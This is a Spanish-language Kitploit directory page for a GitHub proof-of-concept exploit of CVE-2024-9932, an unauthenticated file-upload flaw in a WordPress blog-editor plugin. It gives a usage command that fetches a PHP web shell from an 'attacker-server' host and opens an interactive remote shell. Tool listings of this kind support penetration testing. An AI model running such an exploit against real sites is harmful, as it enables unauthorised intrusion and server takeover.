Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
0-click-RCE-Exploit-for-CVE-2024-9932 — Exploit RCE 0-click no autenticado para CVE-2024-9932. Explota una vulnerabilidad de carga arbitraria de archivos en el plugin Wux Blog Editor de WordPress para subir un payload PHP remoto, detectar el sistema operativo objetivo y lograr la ejecución remota de comandos a través de una shell web interactiva. | Kitploit
Herramientas/GitHubGitHub/joshuaprovoste/0-click-rce-exploit-for-cve-2024-9932
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHub
joshuaprovoste/0-click-rce-exploit-for-cve-2024-9932

0-click-RCE-Exploit-for-CVE-2024-9932

Ver Repositorio
2hace 7 mesesAún no revisado

Acerca de

Exploit RCE 0-click no autenticado para CVE-2024-9932. Explota una vulnerabilidad de carga arbitraria de archivos en el plugin Wux Blog Editor de WordPress para subir un payload PHP remoto, detectar el sistema operativo objetivo y lograr la ejecución remota de comandos a través de una shell web interactiva.

Compartir

CVE-2024-9932 / Exploit RCE de 0 clics

  • Autor: Joshua Provoste
  • https://x.com/JoshuaProvoste/status/1858329238153072668

CVE-2024-9932

Este repositorio contiene un exploit de prueba de concepto para CVE-2024-9932, una vulnerabilidad de subida arbitraria de archivos sin autenticación en el plugin Wux Blog Editor de WordPress, que permite la ejecución remota de comandos (RCE).

Lo que hace el script

El script abusa de un endpoint REST vulnerable para subir un payload PHP remoto sin autenticación. Una vez subido, reconstruye la ubicación final del archivo, detecta el sistema operativo objetivo y proporciona un shell remoto interactivo para la ejecución de comandos.

Uso

root@kitploit:~
python CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php

Tras la ejecución, el script sube el payload, confirma su accesibilidad, detecta el sistema operativo y abre un shell interactivo.

Notas

  • No se requiere autenticación (pre-auth / 0 clics).
Descargar herramienta